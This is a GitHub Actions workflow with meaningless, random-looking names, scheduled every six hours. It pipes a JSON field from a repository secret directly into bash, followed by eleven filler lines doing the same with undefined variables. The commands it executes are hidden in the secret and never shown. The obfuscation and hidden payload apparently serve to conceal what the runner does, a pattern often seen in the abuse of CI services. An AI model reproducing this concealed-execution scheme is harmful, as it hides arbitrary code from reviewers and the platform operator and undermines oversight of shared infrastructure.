name: yebawang8765

on:
  workflow_dispatch:
  schedule:
    - cron: '28 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yebawang8765
        env:
          u5642: ${{ secrets.u5642 }}
        run: |
          echo $u5642 | jq -r .ydb0 | /bin/bash
          echo $pczzb33 | jq -r .ixhs003 | /bin/bash
          echo $ty92 | jq -r .hqj358 | /bin/bash
          echo $x07722 | jq -r .yyvqt6 | /bin/bash
          echo $gon67486 | jq -r .n4 | /bin/bash
          echo $dhyaw7 | jq -r .nt25 | /bin/bash
          echo $bpfz7362 | jq -r .trgg55 | /bin/bash
          echo $jsmk37095 | jq -r .zw1043 | /bin/bash
          echo $cqe15472 | jq -r .vy5885 | /bin/bash
          echo $ur4555 | jq -r .fcy05 | /bin/bash
          echo $n7648 | jq -r .zlxm1 | /bin/bash
          echo $zvfcq44 | jq -r .yy74851 | /bin/bash

